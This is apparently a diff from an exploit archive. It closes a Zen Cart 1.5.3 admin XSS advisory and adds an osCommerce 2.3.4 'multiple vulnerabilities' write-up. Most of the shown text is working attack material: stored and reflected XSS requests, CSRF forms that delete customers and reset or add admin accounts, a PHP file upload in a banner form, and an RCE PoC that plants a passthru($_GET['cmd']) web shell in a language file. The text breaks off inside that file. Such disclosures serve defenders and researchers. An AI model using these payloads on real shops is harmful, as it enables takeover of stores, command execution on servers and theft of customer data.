<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=10')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title=" View Banner "></a>&nbps;'>"><>XSS</td>
<td class="dataTableContent" align="right">'>"><>XSS</td>
<td class="dataTableContent" align="right">0 / 0</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
- Tools -> Newsletter and Product Notifications Manager -> New newsletter
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?action=insert HTTP/1.1
Host: localhost
securityToken=93867dff1d912bde757ce2bc0ac94425&module=newsletter&title=%27%3E%22%3E%3C%3EXSS&message_html=%27%3E%22%3E%3C%3EXSS&content=%27%3E%22%3E%3C%3EXSS&x=32&y=8
Response:
(...)
<td class="dataTableContent"><a href="http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbps;'>"><>XSS</td>
<td class="dataTableContent" align="right">18 bytes</td>
(...)
<table border="0" width="100%" cellspacing="0" cellpadding="2">
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
- Tools -> EZ-Pages -> New file
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/ezpages.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------134785397313015614741294511591
Content-Length: 2253
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="securityToken"
c74a83cefbb5ffc1868dd4a390bd0880
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="x"
41
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="y"
17
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="pages_title"
'>"><>XSS
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="page_open_new_window"
0
-----------------------------134785397313015614741294511591
(...)
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="pages_html_text"
'>"><>XSS
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="alt_url"
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="alt_url_external"
-----------------------------134785397313015614741294511591--
Response:
(...)
<td class="dataTableContent" width="75px" align="right">&nbps;1</td>
<td class="dataTableContent">&nbps;'>"><>XSS</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>Title:&nbps;'>"><>XSS&nbps;|&nbps;Prev/Next Chapter:&nbps;0</b></td>
</tr>
(...)
- Localization -> Currencies -> New currency
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/currencies.php?page=1&action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&title=%27%3E%22%3E%3C%3EXSS&code=%27%3E%22%3E%3C%3EXSS&symbol_left=%27%3E%22%3E%3C%3EXSS&symbol_right=%27%3E%22%3E%3C%3EXSS&decimal_point=%27%3E%22%3E%3C%3EXSS&thousands_point=%27%3E%22%3E%3C%3EXSS&decimal_places=%27%3E%22%3E%3C%3EXSS&value=%27%3E%22%3E%3C%3EXSS&x=13&y=15
Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
<tr>
<td class="infoBoxContent"><br>Title: '>"><>XSS</td>
</tr>
<tr>
<td class="infoBoxContent">Code: '>"</td>
</tr>
<tr>
<td class="infoBoxContent"><br>Symbol Left: '>"><>XSS</td>
</tr>
<tr>
<td class="infoBoxContent">Symbol Right: '>"><>XSS</td>
</tr>
(...)
<tr>
<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
</tr>
</table>
(...)
<tr>
<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
</tr>
- Localization -> Languages -> New language
Affects big part of admin panel.
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/languages.php?action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&name=%27%3E%22%3E%3C%3EXSS&code=xs&image=icon.gif&directory=%27%3E%22%3E%3C%3EXSS&sort_order=%27%3E%22%3E%3C%3EXSS&x=40&y=20
Response:
(...)
<td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbps;MISSING LANGUAGE FILES OR DIRECTORIES ... '>"><>XSS '>"><>XSS</td>
</tr>
</table>
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">xs</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
<tr>
<td class="infoBoxContent"><br>Name: '>"><>XSS</td>
</tr>
<tr>
<td class="infoBoxContent">Code: xs</td>
</tr>
<tr>
<td class="infoBoxContent"><br><img src="http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/'>"><>XSS/images/icon.gif" border="0" alt="'>"><>XSS" title=" '>"><>XSS "></td>
</tr>
<tr>
<td class="infoBoxContent"><br>Directory:<br>http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/<b>'>"><>XSS</b></td>
</tr>
(...)
Further injection:
http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php
- Localization -> Orders status -> Insert
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS&x=9&y=7
Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&oID=5&action=edit'">
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="">&nbps;</td>
(...)
- Locations / Taxes -> Zones -> New zone
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/zones.php?page=1&action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&zone_name=%27%3E%22%3E%3C%3EXSS&zone_code=%27%3E%22%3E%3C%3EXSS&zone_country_id=247&x=17&y=11
Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent" align="center">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
</table>
(...)
<tr>
<td class="infoBoxContent"><br>Zones Name:<br>'>"><>XSS ('>"><>XSS)</td>
</tr>
<tr>
<td class="infoBoxContent"><br>Country: '>"><>XSS</td>
- - Locations / Taxes -> Zone definitions -> Insert
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&geo_zone_name=%27%3E%22%3E%3C%3EXSS&geo_zone_description=%27%3E%22%3E%3C%3EXSS&x=25&y=13
Response:
(...)
</a>&nbps;'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
- Locations / Taxes -> Tax Classes -> New tax class
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_classes.php?page=1&action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_title=%27%3E%22%3E%3C%3EXSS&tax_class_description=%27%3E%22%3E%3C%3EXSS&x=33&y=9
Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
(...)
- - Locations / Taxes -> Tax Rates -> New tax rate
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_rates.php?page=1&action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_id=2&tax_zone_id=2&tax_rate=66&tax_description=%27%3E%22%3E%3C%3EXSS&tax_priority=&x=32&y=16
Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">66%</td>
<td class="dataTableContent">'>"><>XSS</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
(...)
- Customers -> Group Pricing -> Insert
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/group_pricing.php?action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&group_name=%27%3E%22%3E%3C%3EXSS&group_percentage=%27%3E%22%3E%3C%3EXSS&x=10&y=9
Response:
(...)
<td class="dataTableContent">1</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">0.00</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)

664
platforms/php/webapps/34582.txt Executable file
View file

@ -0,0 +1,664 @@
#Title: osCommerce 2.3.4 - Multiple vulnerabilities
#Date: 10.07.14
#Affected versions: => 2.3.4 (latest atm)
#Vendor: oscommerce.com
#Tested on: Apache 2.2.22 [at] Debian
#Contact: smash [at] devilteam.pl
#Cross Site Scripting
1. Reflected XSS -> Send Email
Vulnerable parameters - customers_email_address & mail_sent_to
a) POST
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview HTTP/1.1
Host: localhost
customers_email_address=<script>alert(666)</script>&from=fuck@shit.up&subject=test&message=test
Response:
HTTP/1.1 200 OK
(...)
<td class="smallText"><strong>Customer:</strong><br /><script>alert(666)</script></td>
</tr>
(...)
CSRF PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview" method="POST">
<input type="hidden" name="customers_email_address" value="<script>alert(666)</script>" />
<input type="hidden" name="from" value="fuck@shit.up" />
<input type="hidden" name="subject" value="test" />
<input type="hidden" name="message" value="test" />
<input type="submit" value="Go" />
</form>
</body>
</html>
b) GET
Request:
GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1
Host: localhost
Response:
(...)
<td class="messageStackSuccess"><img src="images/icons/success.gif" border="0" alt="Success" title="Success" />&nbps;Notice: Email sent to: <script>alert(666)</script></td>
</tr>
(...)
2. Persistent XSS via CSRF -> Newsletter
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert HTTP/1.1
Host: localhost
module=newsletter&title=<script>alert(123)</script>&content=<script>alert(456)</script>
CSRF PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert" method="POST">
<input type="hidden" name="module" value="newsletter" />
<input type="hidden" name="title" value="<script>alert(123)</script>" />
<input type="hidden" name="content" value="<script>alert(456)</script>" />
<input type="submit" value="Go" />
</form>
</body>
</html>
First popbox (123) will be executed whenever someone will visit newsletters page:
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php
(...)
<td class="dataTableContent"><a href="http://localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbps;<script>alert(123)</script></td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><strong><script>alert(123)</script></strong></td>
</tr>
(...)
Second one, will be executed whenever someone will visit specific newsletter page:
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=1&action=preview
(...)
<tr>
<td><tt><script>alert(456)</script></tt></td>
</tr>
<tr>
(...)
3. Persistent XSS via CSRF -> Banner manager
Vulnerable parameter - banners_title
PoC:
<html>
<body>
<script>
function go()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?action=insert", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------19390593192018454503847724432");
xhr.withCredentials = true;
var body = "-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_title\"\r\n" +
"\r\n" +
"\x3cscript\x3ealert(666)\x3c/script\x3e\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_url\"\r\n" +
"\r\n" +
"url\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_group\"\r\n" +
"\r\n" +
"footer\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"new_banners_group\"\r\n" +
"\r\n" +
"group\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_image\"; filename=\"info.gif\"\r\n" +
"Content-Type: application/x-php\r\n" +
"\r\n" +
"\x3c?php\n" +
"phpinfo();\n" +
"?\x3e\n" +
"\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_image_local\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_image_target\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"banners_html_text\"\r\n" +
"\r\n" +
"sup\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"date_scheduled\"\r\n" +
"\r\n" +
"2014-07-01\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"expires_date\"\r\n" +
"\r\n" +
"2014-07-31\r\n" +
"-----------------------------19390593192018454503847724432\r\n" +
"Content-Disposition: form-data; name=\"expires_impressions\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------19390593192018454503847724432--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Go" onclick="go();" />
</form>
</body>
</html>
JS will be executed whenever someone will visitd banner manager page or specific banner page.
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?page=1&bID=[ID]
Response:
<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=3')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title="View Banner" /></a>&nbps;<script>alert(666)</script></td>
<td class="dataTableContent" align="right">group</td>
4. Persistent XSS via CSRF -> Locations / Taxes
Countries tab is taken as example, but same vulnerability affects other tabs in 'Locations / Taxes', namely Tax Classes, Tax Rates, Tax Zones and Zones.
PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&action=insert" method="POST">
<input type="hidden" name="countries_name" value="AAAA<script>alert(666)</script>" />
<input type="hidden" name="countries_iso_code_2" value="xs" />
<input type="hidden" name="countries_iso_code_3" value="sed" />
<input type="hidden" name="address_format_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
JS will be executed whenever someone will visitd 'countries' tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php
Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=241&action=edit'">
<td class="dataTableContent">AAAA<script>alert(666)</script></td>
<td class="dataTableContent" align="center" width="40">xs</td>
<td class="dataTableContent" align="center" width="40">sed</td>
(...)
5. Persistent XSS via CSRF -> Localization
a) Currencies
PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&action=insert" method="POST">
<input type="hidden" name="cs" value="" />
<input type="hidden" name="title" value="<script>alert(666)</script>" />
<input type="hidden" name="code" value="666" />
<input type="hidden" name="symbol_left" value="hm" />
<input type="hidden" name="symbol_right" value="mh" />
<input type="hidden" name="decimal_point" value="10" />
<input type="hidden" name="thousands_point" value="100" />
<input type="hidden" name="decimal_places" value="10000" />
<input type="hidden" name="value" value="666"><script>alert(123)</script>" />
<input type="hidden" name="default" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
JS will be executed whenever someone will visit currencies tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php
Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=3&action=edit'">
<td class="dataTableContent"><strong><script>alert(666)</script> (default)</strong></td>
<td class="dataTableContent">666</td>
<td class="dataTableContent" align="right">666.00000000</td>
(...)
b) Languages
PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php?action=insert" method="POST">
<input type="hidden" name="name" value=""><script>alert(666)</script>" />
<input type="hidden" name="code" value="h3ll" />
<input type="hidden" name="image" value="icon.gif" />
<input type="hidden" name="directory" value="asdf" />
<input type="hidden" name="sort_order" value="asdf" />
<input type="hidden" name="default" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
JS will be executed whenever someone will visit langauges tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php
Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php?page=1&lID=2&action=edit'">
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent">66</td>
(...)
c) Orders status
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/orders_status.php?page=1&action=insert HTTP/1.1
Host: localhost
orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B3%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B4%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B5%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B6%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B7%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS
Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><strong>'>"><>XSS</strong></td>
(...)
<td class="infoBoxContent"><br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt="<script>alert(666)</script>" title="<script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf'>"><>XSS/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english/images/icon.gif" border="0" alt="English" title="English" />&nbps;'>"><>XSS</td>
</tr>
#Boring CSRF
- Remove any item from cart
localhost/osc/oscommerce-2.3.4/catalog/shopping_cart.php?products_id=[ID]&action=remove_product
- Add item to cart
localhost/osc/oscommerce-2.3.4/catalog/product_info.php?products_id=[ID]&action=add_product
- Remove address book entry
localhost/osc/oscommerce-2.3.4/catalog/address_book_process.php?delete=1
- Remove specific country
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=1&action=deleteconfirm
- Remove specific currency
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=[ID]&action=deleteconfirm
- Change store credentials
I'm to bored to craft another request's, whole 'Configuration' & 'Catalog' panel suffers on CSRF.
localhost/osc/oscommerce-2.3.4/catalog/admin/configuration.php
...and a lot more.
#Less boring CSRF
- Send email as admin -> Send email
It is able to send email to specific user, newsletter subscribers and all of them. In this case, '***' stands for sending mail to all customers.
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/mail.php?action=send_email_to_user" method="POST">
<input type="hidden" name="customers_email_address" value="***" />
<input type="hidden" name="from" value=""storeowner" <storemail@lol.lo>" />
<input type="hidden" name="subject" value="subject" />
<input type="hidden" name="message" value="sup" />
<input type="submit" value="Go" />
</form>
</body>
</html>
- Delete / Edit specific user
Remove user PoC:
localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=deleteconfirm
Edit user PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=update" method="POST">
<input type="hidden" name="default_address_id" value="1" />
<input type="hidden" name="customers_gender" value="m" />
<input type="hidden" name="customers_firstname" value="juster" />
<input type="hidden" name="customers_lastname" value="testing" />
<input type="hidden" name="customers_dob" value="07/13/2004" />
<input type="hidden" name="customers_email_address" value="szit@szit.szit" />
<input type="hidden" name="entry_company" value="asdf" />
<input type="hidden" name="entry_street_address" value="asdfasdf" />
<input type="hidden" name="entry_suburb" value="asdfsdff" />
<input type="hidden" name="entry_postcode" value="66-666" />
<input type="hidden" name="entry_city" value="asdfasdf" />
<input type="hidden" name="entry_state" value="asdfasdfasdf" />
<input type="hidden" name="entry_country_id" value="5" />
<input type="hidden" name="customers_telephone" value="123456792" />
<input type="hidden" name="customers_fax" value="" />
<input type="hidden" name="customers_newsletter" value="1" />
<input type="submit" value="Go" />
</form>
</body>
</html>
- Add / Edit / Delete admin
Add admin account:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?action=insert" method="POST">
<input type="hidden" name="username" value="haxor" />
<input type="hidden" name="password" value="pwned" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Change admin (set new password):
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=1&action=save" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="newpass" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Remove admin:
localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm
- RCE via CSRF -> Define Languages
It is able to change content of specific file in 'define languages' tab, we're gonna use default english language, and so default files path. File MUST be writable. Value stands for english.php default content; as you can notice, passthru function is being included.
localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english.php?cmd=uname -a
PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/define_language.php?lngdir=english&filename=english.php&action=save" method="POST">
<input type="hidden" name="file_contents" value="<?php
/*
$Id$
osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com
Copyright (c) 2013 osCommerce
Released under the GNU General Public License
*/
// look in your $PATH_LOCALE/locale directory for available locales
// or type locale -a on the server.
// Examples:
// on RedHat try 'en_US'
// on FreeBSD try 'en_US.ISO_8859-1'
// on Windows try 'en', or 'English'
@setlocale(LC_ALL, array('en_US.UTF-8', 'en_US.UTF8', 'enu_usa'));
define('DATE_FORMAT_SHORT', '%m/%d/%Y'); // this is used for strftime()
define('DATE_FORMAT_LONG', '%A %d %B, %Y'); // this is used for strftime()
define('DATE_FORMAT', 'm/d/Y'); // this is used for date()
define('DATE_TIME_FORMAT', DATE_FORMAT_SHORT . ' %H:%M:%S');
define('JQUERY_DATEPICKER_I18N_CODE', ''); // leave empty for en_US; see http://jqueryui.com/demos/datepicker/#localization
define('JQUERY_DATEPICKER_FORMAT', 'mm/dd/yy'); // see http://docs.jquery.com/UI/Datepicker/formatDate
@passthru($_GET['cmd']);
////
// Return date in raw format
// $date should be in format mm/dd/yyyy
// raw date is in format YYYYMMDD, or DDMMYYYY
function tep_date_raw($date, $reverse = false) {
if ($reverse) {
return substr($date, 3, 2) . substr($date, 0, 2) . substr($date, 6, 4);
} else {
return substr($date, 6, 4) . substr($date, 0, 2) . substr($date, 3, 2);
}
}
// if USE_DEFAULT_LANGUAGE_CURRENCY is true, use the following currency, instead of the applications default currency (used when changing language)
define('LANGUAGE_CURRENCY', 'USD');
// Global entries for the <html> tag
define('HTML_PARAMS', 'dir="ltr" lang="en"');
// charset for web pages and emails
define('CHARSET', 'utf-8');
// page title
define('TITLE', STORE_NAME);
// header text in includes/header.php
define('HEADER_TITLE_CREATE_ACCOUNT', 'Create an Account');
define('HEADER_TITLE_MY_ACCOUNT', 'My Account');
define('HEADER_TITLE_CART_CONTENTS', 'Cart Contents');
define('HEADER_TITLE_CHECKOUT', 'Checkout');
define('HEADER_TITLE_TOP', 'Top');
define('HEADER_TITLE_CATALOG', 'Catalog');
define('HEADER_TITLE_LOGOFF', 'Log Off');
define('HEADER_TITLE_LOGIN', 'Log In');
// footer text in includes/footer.php
define('FOOTER_TEXT_REQUESTS_SINCE', 'requests since');
// text for gender
define('MALE', 'Male');
define('FEMALE', 'Female');
define('MALE_ADDRESS', 'Mr.');
define('FEMALE_ADDRESS', 'Ms.');
// text for date of birth example
define('DOB_FORMAT_STRING', 'mm/dd/yyyy');
// checkout procedure text
define('CHECKOUT_BAR_DELIVERY', 'Delivery Information');
define('CHECKOUT_BAR_PAYMENT', 'Payment Information');
define('CHECKOUT_BAR_CONFIRMATION', 'Confirmation');
define('CHECKOUT_BAR_FINISHED', 'Finished!');
// pull down default text
define('PULL_DOWN_DEFAULT', 'Please Select');
define('TYPE_BELOW', 'Type Below');
// javascript messages
define('JS_ERROR', 'Errors have occured during the process of your form.\n\nPlease make the following corrections:\n\n');
define('JS_REVIEW_TEXT', '* The \'Review Text\' must have at least ' . REVIEW_TEXT_MIN_LENGTH . ' characters.\n');
define('JS_REVIEW_RATING', '* You must rate the product for your review.\n');
define('JS_ERROR_NO_PAYMENT_MODULE_SELECTED', '* Please select a payment method for your order.\n');
define('JS_ERROR_SUBMITTED', 'This form has already been submitted. Please press Ok and wait for this process to be completed.');
define('ERROR_NO_PAYMENT_MODULE_SELECTED', 'Please select a payment method for your order.');
define('CATEGORY_COMPANY', 'Company Details');
define('CATEGORY_PERSONAL', 'Your Personal Details');
define('CATEGORY_ADDRESS', 'Your Address');
define('CATEGORY_CONTACT', 'Your Contact Information');
define('CATEGORY_OPTIONS', 'Options');
define('CATEGORY_PASSWORD', 'Your Password');
define('ENTRY_COMPANY', 'Company Name:');
define('ENTRY_COMPANY_TEXT', '');
define('ENTRY_GENDER', 'Gender:');
define('ENTRY_GENDER_ERROR', 'Please select your Gender.');
define('ENTRY_GENDER_TEXT', '*');
define('ENTRY_FIRST_NAME', 'First Name:');
define('ENTRY_FIRST_NAME_ERROR', 'Your First Name must contain a minimum of ' . ENTRY_FIRST_NAME_MIN_LENGTH . ' characters.');
define('ENTRY_FIRST_NAME_TEXT', '*');
define('ENTRY_LAST_NAME', 'Last Name:');
define('ENTRY_LAST_NAME_ERROR', 'Your Last Name must contain a minimum of ' . ENTRY_LAST_NAME_MIN_LENGTH . ' characters.');
define('ENTRY_LAST_NAME_TEXT', '*');
define('ENTRY_DATE_OF_BIRTH', 'Date of Birth:');
define('ENTRY_DATE_OF_BIRTH_ERROR', 'Your Date of Birth must be in this format: MM/DD/YYYY (eg 05/21/1970)');
define('ENTRY_DATE_OF_BIRTH_TEXT', '* (eg. 05/21/1970)');
define('ENTRY_EMAIL_ADDRESS', 'E-Mail Address:');
define('ENTRY_EMAIL_ADDRESS_ERROR', 'Your E-Mail Address must contain a minimum of ' . ENTRY_EMAIL_ADDRESS_MIN_LENGTH . ' characters.');
define('ENTRY_EMAIL_ADDRESS_CHECK_ERROR', 'Your E-Mail Address does not appear to be valid - please make any necessary corrections.');
define('ENTRY_EMAIL_ADDRESS_ERROR_EXISTS', 'Your E-Mail Address already exists in our records - please log in with the e-mail address or create an account with a different address.');
define('ENTRY_EMAIL_ADDRESS_TEXT', '*');
define('ENTRY_STREET_ADDRESS', 'Street Address:');
define('ENTRY_STREET_ADDRESS_ERROR', 'Your Street Address must contain a minimum of ' . ENTRY_STREET_ADDRESS_MIN_LENGTH . ' characters.');
define('ENTRY_STREET_ADDRESS_TEXT', '*');
define('ENTRY_SUBURB', 'Suburb:');
define('ENTRY_SUBURB_TEXT', '');
define('ENTRY_POST_CODE', 'Post Code:');
